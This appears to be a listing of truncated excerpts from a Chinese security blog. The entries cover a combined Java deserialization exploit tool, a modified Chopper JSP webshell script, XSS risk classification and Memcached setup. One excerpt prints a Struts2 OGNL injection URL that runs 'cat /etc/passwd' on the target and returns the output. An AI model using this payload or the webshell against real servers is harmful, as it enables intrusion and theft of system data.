Java反序列化漏洞已经被曝出一段时间了,本人参考了网上大神的放出来的工具,将Jboss、Websphere和weblogic的反序列化漏洞的利用集成到了一起。FreeBuf上已经公开了JBoss反序列化执行命令回显的工具,在本文中就不多做叙述了。其实,WebSphere的利用过程也和JBoss差不多,只不过在发送Payload和解析结果的时候多了个Base64编码(解码)的过程。 本工具暂时支持...
某些朋友需求,这里简单的修改了下菜刀原作者的JSP脚本。主要是修复了一些BUG和代码优化,新增了查询自定义备份功能。 修复BUG: 1、初始化获取容器绝对路径错误如:原本路径是D:wooyun菜刀连接默认跳转到了:D:wooyunwooyun目录。 2、修改了无法连接Oracle数据库问题 3、修改了远程下载代码 4、重新压了下代码 新的服务器端代码如下:...
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。 喜欢就点一下感谢吧^_^ 带回显命令执行: https://www.webshell.cc/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passw...
0x00 前言 众所周知xss漏洞的风险定义一直比较模糊,XSS漏洞属于高危漏洞还是低风险漏洞一直以来都有所争议。XSS漏洞类型主要分为两种持久型和非持久型: 1. 非持久型XSS漏洞一般存在于URL参数中,需要访问黑客构造好的特定URL才能触发漏洞。 2. 持久型XSS漏洞一般存在于富文本等交互功能,如发帖留言等,黑客可以用XSS内容经正常功能进入数据库持久保存。 3. DOM XSS漏洞,也分...
朋友公司开发的项目要用到缓存,于是叫我推荐一个,我说我们公司在用Memcached,然后就问了我一堆关于Memcached的问题,直接把我问的无言了,因为虽然项目用到了,但是我自己却没搞过这个,只是知道有这么个东西存在,唉… 准备工作: 1.从http://splinedancer.com/memcached-win32/下载Memcached for Windows。解压至任意目录(如C:\me...